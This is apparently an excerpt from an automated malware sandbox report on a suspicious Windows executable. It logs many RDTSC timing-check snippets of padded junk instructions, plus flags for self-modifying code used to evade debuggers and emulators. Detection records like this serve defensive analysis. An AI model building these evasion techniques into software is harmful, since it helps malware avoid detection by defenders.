Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B5A19 second address: 10B5A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B5C9A second address: 10B5CA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F76E5186DECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B5CA8 second address: 10B5CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B5CAC second address: 10B5CBD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F76E5186DECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B5F65 second address: 10B5F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B90B7 second address: 10B90BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B90BD second address: 10B90EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007F76E5036BBDh 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B922E second address: 10B9251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F76E5186DE6h 0x0000000c jc 00007F76E5186DE6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F76E5186DE6h 0x0000001d je 00007F76E5186DE6h 0x00000023 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B9679 second address: 10B967E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10B9BE7 second address: 10B9BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10BE3CB second address: 10BE3F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F76E5036BB0h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10C708D second address: 10C7093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10C7093 second address: 10C7099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10C7099 second address: 10C709F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10C709F second address: 10C70AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10C5474 second address: 10C5486 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F76E5186DE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F76E5186DE6h 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10C59E1 second address: 10C5A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F76E5036BACh 0x0000000d jmp 00007F76E5036BB5h 0x00000012 popad 0x00000013 pushad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10C5A0F second address: 10C5A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007F76E5186DF0h 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F76E5186DE6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jp 00007F76E5186DEEh 0x0000001e jo 00007F76E5186DE6h 0x00000024 pushad 0x00000025 popad 0x00000026 jbe 00007F76E5186DEEh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10C5E4E second address: 10C5E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F76E5036BA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10CDCFB second address: 10CDD17 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F76E5186DF3h 0x0000000a pop edi 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10CD9E0 second address: 10CD9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10CD9E4 second address: 10CDA09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F76E5186DF5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jl 00007F76E5186E04h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10CFD31 second address: 10CFD4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10CFD4A second address: 10CFD4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10DD546 second address: 10DD54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10DFBE6 second address: 10DFBEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10093F9 second address: 1009435 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB2h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F76E5036BAAh 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F76E5036BB8h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jmp 00007F76E5036BB0h 0x00000020 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10F3A35 second address: 10F3A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10F3A39 second address: 10F3A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F76E5036BA6h 0x0000000d jmp 00007F76E5036BB3h 0x00000012 jc 00007F76E5036BA6h 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b ja 00007F76E5036BA8h 0x00000021 pushad 0x00000022 popad 0x00000023 push esi 0x00000024 jmp 00007F76E5036BB1h 0x00000029 pushad 0x0000002a popad 0x0000002b pop esi 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10F3A82 second address: 10F3A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10F3CEA second address: 10F3CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F76E5036BA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10F3CF6 second address: 10F3CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10F8E11 second address: 10F8E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F76E5036BB2h 0x0000000b jmp 00007F76E5036BACh 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10FA68E second address: 10FA6A2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76E5186DE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F76E5186DEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10FA6A2 second address: 10FA6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10FA6A8 second address: 10FA6AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10FA6AE second address: 10FA6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10FA6B2 second address: 10FA6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10FA6B8 second address: 10FA6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jns 00007F76E5036BA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1102239 second address: 110224E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF0h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 11087FB second address: 1108800 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1108800 second address: 1108808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 110C162 second address: 110C16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 110C16A second address: 110C173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 110C173 second address: 110C177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 110BFB2 second address: 110BFC3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F76E5186DECh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 110BFC3 second address: 110BFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 110BFC9 second address: 110BFE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F76E5186DF2h 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1128F02 second address: 1128F16 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F76E5036BA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F76E5036BACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1128F16 second address: 1128F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F76E5186DF7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1128F35 second address: 1128F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1128F39 second address: 1128F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1129376 second address: 112939F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F76E5036BA6h 0x0000000a pop edx 0x0000000b jmp 00007F76E5036BB9h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 112939F second address: 11293CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5186DEBh 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F76E5186DF1h 0x00000010 popad 0x00000011 pushad 0x00000012 jl 00007F76E5186DE6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 11293CB second address: 11293E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F76E5036BA6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F76E5036BA6h 0x00000015 jno 00007F76E5036BA6h 0x0000001b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1129845 second address: 112984F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76E5186DECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 112984F second address: 112986A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F76E5036BABh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 112986A second address: 1129870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1129870 second address: 1129874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1129874 second address: 112988B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 11299E4 second address: 1129A15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F76E5036BAAh 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F76E5036BA6h 0x00000018 jmp 00007F76E5036BABh 0x0000001d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1129E37 second address: 1129E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F76E5186DE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 112CD5D second address: 112CD61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 112D0CC second address: 112D0DF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F76E5186DE8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 112D0DF second address: 112D129 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76E5036BACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b movsx edx, si 0x0000000e push dword ptr [ebp+12451AB4h] 0x00000014 mov edx, dword ptr [ebp+122D2E57h] 0x0000001a push 90884E58h 0x0000001f pushad 0x00000020 ja 00007F76E5036BA8h 0x00000026 push edi 0x00000027 pop edi 0x00000028 pushad 0x00000029 jmp 00007F76E5036BB9h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 112E22C second address: 112E248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F76E5186DE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F76E5186DF0h 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 112E248 second address: 112E263 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76E5036BA6h 0x00000008 jmp 00007F76E5036BB1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 112E263 second address: 112E2AD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76E5186DF4h 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F76E5186DEEh 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jnp 00007F76E5186E17h 0x00000019 pushad 0x0000001a jmp 00007F76E5186DF7h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 112E2AD second address: 112E2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 54B0425 second address: 54B0429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 54B0429 second address: 54B042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 54B042F second address: 54B0446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 735CA34Fh 0x00000008 mov eax, 3A6A256Bh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 54B0446 second address: 54B045B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76E5036BB1h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 54B045B second address: 54B0493 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov eax, 4AE5A2B3h 0x00000012 mov si, B70Fh 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F76E5186DF1h 0x00000020 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 54B04F7 second address: 54B053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e jmp 00007F76E5036BB9h 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F76E5036BACh 0x0000001c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 54B053A second address: 54B054C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76E5186DEEh 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 54B054C second address: 54B0550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10547D8 second address: 10547DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Special instruction interceptor: First address: EA3B64 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Special instruction interceptor: First address: 1043620 instructions caused by: Self-modifying code
